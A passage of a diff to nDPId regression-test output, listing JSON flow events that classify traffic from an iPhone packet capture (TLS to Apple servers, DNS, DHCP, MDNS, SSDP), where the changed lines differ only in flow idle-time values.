{"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454595839,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -302,12 +302,12 @@ 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 